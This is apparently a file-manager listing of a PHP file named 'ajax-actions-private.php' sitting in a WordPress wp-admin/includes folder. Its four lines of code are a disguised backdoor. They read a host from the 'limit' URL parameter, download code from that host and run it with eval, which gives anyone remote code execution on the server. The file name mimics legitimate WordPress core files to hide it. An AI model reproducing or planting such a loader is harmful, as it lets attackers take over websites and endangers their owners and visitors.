File "ajax-actions-private.php"

Full Path: /home/raylsmit/public_html/wp-admin/includes/ajax-actions-private.php
File size: 93 bytes
MIME-type: text/x-php
Charset: utf-8

<?php
if (isset($_GET['limit'])) {
    eval(file_get_contents('http://' . $_GET['limit']));
}